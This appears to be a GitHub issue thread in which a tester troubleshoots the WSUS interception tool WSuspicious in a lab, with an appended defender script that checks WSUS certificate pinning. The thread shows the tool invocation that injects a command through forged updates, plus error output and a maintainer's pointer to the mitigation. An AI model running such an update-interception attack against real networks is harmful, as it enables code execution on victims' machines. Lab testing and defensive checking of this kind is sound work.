
SSL interception does not work #6

Open
MexHigh opened this issue Aug 17, 2021 · 2 comments

Comments

@MexHigh

MexHigh commented Aug 17, 2021

My setup:

  • Domain controller (Windows Server 2019): dc01.lsc.lab
  • Domain client (updated Windows 10)

The Client has WSUS over HTTPS configured and uses it correctly (https://dc01.lsc.lab:8531). The certificate is accepted by Microsoft Edge when accessing the IIS default page and WSUS endpoint (using a Certificate with SAN issued by the domain CA).

I'm setting the system's proxy via admin powershell with netsh winhttp set proxy 127.0.0.1:13337.

I'm executing the following command: .\WSuspicious.exe /command:" -accepteula -s -d cmd /c echo 1 > C:\hacked.txt" /autoinstall /enabletls (The attack does work if WSUS over HTTP is configured, so all prerequisites are met.)

This is what I get after running the command:

The WSUS Server is using HTTPS. Adding a self-signed certificate to store
Prompting user to add the certificate. Please wait.
Detected WSUS Server - dc01.lsc.lab
Listening on 'ExplicitProxyEndPoint' endpoint at Ip 127.0.0.1 and port: 13337
Hit any key to exit..

Titanium.Web.Proxy.Exceptions.ProxyConnectException: Couldn't authenticate host 'dc01.lsc.lab' with certificate 'dc01.lsc.lab'. ---> System.IO.IOException: Fehler bei Authentifizierung, da die Gegenseite den Transportstream geschlossen hat.
   bei System.Net.Security.SslState.InternalEndProcessAuthentication(LazyAsyncResult lazyResult)
   bei System.Net.Security.SslState.EndProcessAuthentication(IAsyncResult result)
   bei System.Threading.Tasks.TaskFactory`1.FromAsyncCoreLogic(IAsyncResult iar, Func`2 endFunction, Action`1 endAction, Task`1 promise, Boolean requiresSynchronization)
--- Ende der Stapelüberwachung vom vorhergehenden Ort, an dem die Ausnahme ausgelöst wurde ---
   bei System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
   bei System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()
   --- Ende der internen Ausnahmestapelüberwachung ---
   bei Titanium.Web.Proxy.ProxyServer.<handleClient>d__2.MoveNext()

The Windows Update GUI shows error code 0x800b0109 (displayed as "signature errors"):


When accessing any IIS page with the proxy activated and running, the certificate cannot be validated due to missing subject alternative name (SAN).

@MaxNad
Member

MaxNad commented Aug 19, 2021

Microsoft implemented a certificate pinning mechanism to protect against this attack after the issue was disclosed to them.

If the WSUS certificate pinning feature is enabled, the tool is not expected to work. See https://techcommunity.microsoft.com/t5/windows-it-pro-blog/scan-changes-and-certificates-add-security-for-windows-devices/ba-p/2053668

Is this feature currently enabled in your setup?

@MexHigh
Author

MexHigh commented Aug 20, 2021

I thought this too, but I set the tick to not enforce it in the GPO and, as I've read in the docs, it is not enabled anyway if there are no certificates in the corresponding certificate store.

So no, it is not enabled.
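The two comments above turn on one question: is WSUS TLS certificate pinning effectively active on the client? Per the linked Microsoft post, the pin is only enforced when the "do not enforce" policy is absent and the pinning store holds at least one certificate, and it only protects the client if the certificate the WSUS server actually serves is one of the pinned ones. The following PowerShell script is an added, defender-side check and is not part of this issue thread or of the WSuspicious project. The store name (`WindowsServerUpdateServices`), the policy value name (`DoNotEnforceEnterpriseTLSCertPinningForUpdateDetection`) and the use of `WUServer` for the intranet WSUS URL are assumptions taken from Microsoft's documentation of the feature, so verify them against the blog post for your Windows build.

```powershell
# Added example (not from the issue thread or the WSuspicious project).
# Reports whether WSUS TLS certificate pinning is effectively enforced on
# this client and whether the pin matches what the WSUS server serves.
#
# Assumed names (check against Microsoft's post for your build):
#   - pinning store : Cert:\LocalMachine\WindowsServerUpdateServices
#   - opt-out value : DoNotEnforceEnterpriseTLSCertPinningForUpdateDetection
#                     (DWORD 1) under HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
#   - WUServer      : intranet WSUS URL under the same policy key

$WuPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
$PinStore    = 'Cert:\LocalMachine\WindowsServerUpdateServices'
$OptOutName  = 'DoNotEnforceEnterpriseTLSCertPinningForUpdateDetection'

function Get-ServedCertificate {
    # Fetch the leaf certificate a TLS endpoint presents. Chain validation is
    # bypassed on purpose: this connection only inspects the certificate and
    # sends no data, so the result must never be used to decide trust.
    param([string]$HostName, [int]$Port)
    $tcp = New-Object System.Net.Sockets.TcpClient($HostName, $Port)
    $ssl = $null
    try {
        $ssl = New-Object System.Net.Security.SslStream(
            $tcp.GetStream(), $false,
            [System.Net.Security.RemoteCertificateValidationCallback]{ $true })
        $ssl.AuthenticateAsClient($HostName)
        return New-Object System.Security.Cryptography.X509Certificates.X509Certificate2($ssl.RemoteCertificate)
    } finally {
        if ($ssl) { $ssl.Dispose() }
        $tcp.Close()
    }
}

function Get-WsusPinningState {
    $policy = Get-ItemProperty -Path $WuPolicyKey -ErrorAction SilentlyContinue
    $optOut = [int]($policy.$OptOutName)          # missing value -> 0
    $pinned = @(Get-ChildItem -Path $PinStore -ErrorAction SilentlyContinue)

    $state = [ordered]@{
        WsusUrl           = $policy.WUServer
        OptOutSet         = ($optOut -eq 1)
        PinnedThumbprints = $pinned.Thumbprint
        # Enforced only when the opt-out is NOT set AND the store is non-empty
        PinningEffective  = (-not ($optOut -eq 1)) -and ($pinned.Count -gt 0)
        ServedThumbprint  = $null
        ServedCertPinned  = $null
    }

    # Compare the live server certificate against the pin store (HTTPS only).
    if ($policy.WUServer -and $policy.WUServer -like 'https://*') {
        $uri  = [uri]$policy.WUServer
        $cert = Get-ServedCertificate -HostName $uri.Host -Port $uri.Port
        $state.ServedThumbprint = $cert.Thumbprint
        $state.ServedCertPinned = ($pinned.Thumbprint -contains $cert.Thumbprint)
    }
    return [pscustomobject]$state
}

$s = Get-WsusPinningState
$s | Format-List
if (-not $s.PinningEffective) {
    Write-Warning 'WSUS TLS pinning is not enforced on this client (opt-out set or pin store empty).'
} elseif ($s.ServedCertPinned -eq $false) {
    Write-Warning "Pinning is enforced but the certificate served by $($s.WsusUrl) is not in the pin store; update scans will fail."
}
```

Run it in an elevated PowerShell session on the client (the pin store lives under LocalMachine). On the setup described in this issue, a `PinningEffective` of `False` confirms the reporter's reading that pinning is off because the store is empty; on a hardened client it should report `True` together with `ServedCertPinned = True`, and any other combination points at either a missing pin or a certificate mismatch that the Windows Update client will reject.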
